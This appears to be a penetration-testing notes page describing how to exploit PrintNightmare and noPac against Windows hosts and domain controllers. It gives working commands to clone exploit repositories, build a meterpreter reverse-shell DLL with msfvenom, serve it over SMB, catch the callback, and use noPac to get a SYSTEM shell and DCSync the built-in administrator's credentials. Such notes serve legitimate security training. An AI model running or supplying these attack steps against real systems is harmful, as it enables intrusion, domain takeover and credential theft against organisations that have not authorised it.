Known Vulnerabilities
PrintNightmare (CVE-2021-1675)
PrintNightmare is the nickname given to two vulnerabilities (CVE-2021-34527 and CVE-2021-1675) found in the Print Spooler service that runs on all Windows operating systems. Many exploits have been written based on these vulnerabilities that allow for privilege escalation and remote code execution.
Cloning the Exploit
git clone https://github.com/cube0x0/CVE-2021-1675.gitFor this exploit to work successfully, we will need to use cube0x0's version of Impacket. We may need to uninstall the version of Impacket on our attack host and install cube0x0's
pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py installEnumerating for MS-RPRN
We can use rpcdump.py to see if Print System Asynchronous Protocol and Print System Remote Protocol are exposed on the target.
rpcdump.py @IP | egrep 'MS-RPRN|MS-PAR'After confirming this, we can proceed with attempting to use the exploit. We can begin by crafting a DLL payload using msfvenom.
Generating a DLL Payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=XXXX-f dll > backupscript.dllCreating a Share with smbserver.py
We will then host this payload in an SMB share we create on our attack host using smbserver.py.
sudo smbserver.py -smb2support CompData /path/to/payloadDll/Configuring & Starting MSF multi/handler
Once the share is created and hosting our payload, we can use MSF to configure & start a multi handler responsible for catching the reverse shell that gets executed on the target.
msf> use exploit/multi/handlerRunning the Exploit
With the share hosting our payload and our multi handler listening for a connection, we can attempt to run the exploit against the target. The command below is how we use the exploit:
Notice how at the end of the command, we include the path to the share hosting our payload (\\ShareName\nameofpayload.dll). If all goes well after running the exploit, the target will access the share and execute the payload. The payload will then call back to our multi handler giving us an elevated SYSTEM shell.
SamAccountNAme / nopac (CVE-2021-42287 / CVE-2021-42278)
This vulnerability encompasses two CVEs 2021-42278 and 2021-42287, allowing for intra-domain privilege escalation from any standard domain user to Domain Admin level access in one single command.
This exploit path takes advantage of being able to change the SamAccountName of a computer account to that of a Domain Controller. By default, authenticated users can add up to ten computers to a domain. When doing so, we change the name of the new host to match a Domain Controller's SamAccountName. Once done, we must request Kerberos tickets causing the service to issue us tickets under the DC's name instead of the new name. When a TGS is requested, it will issue the ticket with the closest matching name. Once done, we will have access as that service and can even be provided with a SYSTEM shell on a Domain Controller. The flow of the attack is outlined in detail in this blog post.
Cloning the NoPac Exploit Repo
git clone https://github.com/Ridter/noPac.gitOnce Impacket is installed and we ensure the repo is cloned to our attack box, we can use the scripts in the NoPac directory to check if the system is vulnerable using a scanner (scanner.py) then use the exploit (noPac.py) to gain a shell as NT AUTHORITY/SYSTEM.
Scanning for NoPac
We can use the scanner with a standard domain user account to attempt to obtain a TGT from the target Domain Controller. If successful, this indicates the system is, in fact, vulnerable. In some environments, an astute sysadmin may set the ms-DS-MachineAccountQuota value to 0. If this is the case, the attack will fail because our user will not have the rights to add a new machine account.
sudo python3 scanner.py domain/user:password -dc-ip <dc-ip> -use-ldapRunning NoPac & Getting a Shell
There are many different ways to use NoPac to further our access. One way is to obtain a shell with SYSTEM level privileges. We can do this by running noPac.py with the syntax below to impersonate the built-in administrator account and drop into a semi-interactive shell session on the target Domain Controller. This could be "noisy" or may be blocked by AV or EDR.
sudo python3 noPac.py domain/user:password -dc-ip <dc-ip> -dc-host <dc-hostname> -shell --impersonate administrator -use-ldapUsing noPac to DCSync the Built-in Administrator Account
We could then use the ccache file to perform a pass-the-ticket and perform further attacks such as DCSync. We can also use the tool with the -dump flag to perform a DCSync using secretsdump.py. This method would still create a ccache file on disk, which we would want to be aware of and clean up.
sudo python3 noPac.py domain/user:password -dc-ip <dc-ip> -dc-host <dc-hostname> --impersonate administrator -use-ldap -dump -just-dc-user domain/administratorLast updated